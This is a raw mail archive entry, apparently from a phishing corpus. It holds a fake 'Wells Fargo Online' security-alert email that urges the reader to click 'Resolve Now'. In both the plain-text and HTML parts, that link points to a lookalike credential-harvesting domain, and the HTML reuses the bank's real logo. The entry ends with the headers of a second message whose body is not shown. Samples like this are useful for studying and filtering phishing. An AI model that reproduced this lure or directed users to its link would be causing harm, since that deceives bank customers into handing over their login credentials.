From: "Wells Fargo Online" <alerts.wellsfargo@email.com>
Date: Tue, 15 Aug 2017 15:30:38 -0700
Return-Path: alerts.wellsfargo@email.com
Message-ID: <STANSERVER2abYTHrdu00005653@StanServer2.domain.local>
X-OriginalArrivalTime: 15 Aug 2017 22:30:38.0221 (UTC) FILETIME=[1E9773D0:01D31616]
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 283

You will not see this in a MIME-aware mail reader.
--===============0057759210==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


    =

    =

   =

   =

    =

    	 Replies to this email are not monitored	  =

	  =

  =

   =

   =

    =

      =


	  =

    	  =

   =

    =


	 Dear Valued Customer,

You have 1 unread security alert in your account!

Resolve the problem to have full access back on your account.

<a href =3D 'https://www.connect.secure.wellsfargo.valfsoketi.com/auth/logi=
n/present/'; return false;" >Resolve Now

A copy of this notice will be available in your online statement.

Yours Sincerely,
Wells Fargo Online
	  =

   =

    =

    	 =

	 =20
--===============0057759210==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><table id=3D"wrapper" style=3D"letter-spacing: norma=
l; orphans: auto; text-indent: 0px; text-transform: none; widows: auto; wor=
d-spacing: 0px; -webkit-text-stroke-width: 0px; font-family: Arial, sans-se=
rif; table-layout: fixed; background-color: rgb(255, 255, 255);" border=3D"=
0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;" align=3D"center" bgc=
olor=3D"#E9E9E9">
<table class=3D"inner" align=3D"center" border=3D"0" cellpadding=3D"0" cell=
spacing=3D"0" width=3D"570">
<tbody>
<tr>
<td class=3D"spacer" style=3D"color: black; border-collapse: collapse;" hei=
ght=3D"20">&nbsp;</td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" height=3D"5" bgcolor=3D"#FCFCFC">&nbsp;</td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse;" bgcolor=3D"#FCFCFC">
<table class=3D"inner" align=3D"left" border=3D"0" cellpadding=3D"0" cellsp=
acing=3D"0" width=3D"570">
<tbody>
<tr>
<td class=3D"spacer" style=3D"color: black; border-collapse: collapse;">
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"261">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" width=3D"7">&nbsp;</td>
<td class=3D"spacer" style=3D"color: rgb(153, 153, 153); border-collapse: c=
ollapse; font-family: Verdana, Geneva, sans-serif; font-size: 10px;" align=
=3D"left" height=3D"19" valign=3D"middle" width=3D"194">Replies to this ema=
il are not monitored</td>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" width=3D"7">&nbsp;</td></tr></tbody></table></td>
<td style=3D"color: black; border-collapse: collapse;">&nbsp;</td></tr></tb=
ody></table></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" height=3D"5" bgcolor=3D"#FCFCFC"><img src=3D"http://f.email.b=
arclays.co.uk/i/11/268733543/spacer.gif" alt=3D"" style=3D"display: block;"=
 height=3D"10" border=3D"0" width=3D"10" /></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" height=3D"6">&nbsp;</td></tr></tbody></table></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse;" align=3D"center" bgc=
olor=3D"#E9E9E9">
<table class=3D"inner" align=3D"center" border=3D"0" cellpadding=3D"0" cell=
spacing=3D"0" width=3D"570">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;" bgcolor=3D"#FFFFFF">
<table class=3D"inner" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wid=
th=3D"570">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;">&nbsp;&nbsp; <img sr=
c=3D"http://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.com/img/header/=
logo_62sq.gif" height=3D"62" width=3D"62" /><br /><br /></td>
<td style=3D"color: black; border-collapse: collapse;">
<table class=3D"widthauto" align=3D"right" border=3D"0" cellpadding=3D"0" c=
ellspacing=3D"0" width=3D"392">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;">&nbsp;</td>
<td style=3D"color: black; border-collapse: collapse;" width=3D"14">&nbsp;<=
/td></tr></tbody></table></td></tr></tbody></table></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse;" bgcolor=3D"#FFFFFF">
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" width=3D"10">&nbsp;<br /><br /></td>
<td style=3D"color: black; border-collapse: collapse;"><font face=3D"Verdan=
a" size=3D"2">Dear Valued Customer,<br /><br /></font><span style=3D"color:=
 rgb(0, 0, 0); font-family: Verdana; font-size: small; font-style: normal; =
font-variant: normal; font-weight: normal; letter-spacing: normal; line-hei=
ght: normal; orphans: auto; text-align: start; text-indent: 0px; text-trans=
form: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text=
-stroke-width: 0px; float: none; display: inline !important; background-col=
or: rgb(255, 255, 255);">You have 1 unread security alert in your account!<=
br /><br />Resolve the problem to have full access back on your account.<br=
 /><br /><a href =3D 'https://www.connect.secure.wellsfargo.valfsoketi.com/=
auth/login/present/'; return false;" >Resolve Now</a><br /><br />A copy of =
this notice will be available in your online statement.<br /><br />Yours Si=
ncerely,<br />Wells Fargo Online<br /></span></td>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" width=3D"10">&nbsp;</td></tr></tbody></table></td></tr></tbod=
y></table></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse;" align=3D"center" bgc=
olor=3D"#E9E9E9">
<table class=3D"inner" align=3D"center" border=3D"0" cellpadding=3D"0" cell=
spacing=3D"0" width=3D"570">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;" bgcolor=3D"#FFFFFF">
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;" width=3D"18">&nbsp;<=
/td>
<td style=3D"color: black; border-collapse: collapse;"><br /></td>
<td style=3D"color: black; border-collapse: collapse;" width=3D"18">&nbsp;<=
/td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></tabl=
e></html>
--===============0057759210==--

From jose@monkey.org Wed Aug 16 19:26:34 2017 +0000
Return-Path: missy.bowstring@llojibwe.org
Delivered-To: jose@monkey.org
X-FDA: 73180248708.25.scale85_566c161deb054
X-Spam-Summary: 50,3,0,7908b2f8c76e8d77,d41d8cd98f00b204,missy.bowstring@llojibwe.org,,RULES_HIT:10:41:72:355:379:387:582:960:962:967:973:983:988:989:1021:1029:1152:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1533:1534:1541:1575:1588:1589:1592:1594:1691:1711:1714:1730:1748:1777:1792:2525:2527:2528:2559:2564:2610:2682:2685:2859:2890:2902:2915:2917:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3747:3867:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4048:4321:4379:4416:5007:6117:6261:6642:6658:6659:6678:7688:8583:8603:8957:9025:9080:9388:9855:9868:9873:9874:9908:10004:10026:10049:10197:10243:10346:10400:10919:10920:10921:11257:11656:11658:11914:12043:12225:12438:12519:12521:12663:12895:13132:13139:13163:13229:13231:13237:13439:14093:14181:14659:14721:14827:14885:21212:21326:21433:21450:21451:21499:21627:30001:30022:30054:30069:30091,0,RBL:96.2.187.35:@llojibwe.org:.lbl8.mailshell.net-62.8.0.100 64.201.201.201,CacheIP:n
X-HE-Tag: scale85_566c161deb054
X-Filterd-Recvd-Size: 3657
Received: from llex2013.LLOjibwe.com (mail.lldrm.org [96.2.187.35])
	by imf13.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 16 Aug 2017 19:26:33 +0000 (UTC)
Received: from LLEX2013.LLOjibwe.com (10.1.0.26) by llex2013.LLOjibwe.com
 (10.1.0.26) with Microsoft SMTP Server (TLS) id 15.0.995.29; Wed, 16 Aug 2017
 14:27:01 -0500
Received: from LLEX2013.LLOjibwe.com ([fe80::5433:fd4b:2273:1e66]) by
 llex2013.LLOjibwe.com ([fe80::5433:fd4b:2273:1e66%14]) with mapi id
 15.00.0995.032; Wed, 16 Aug 2017 14:27:01 -0500
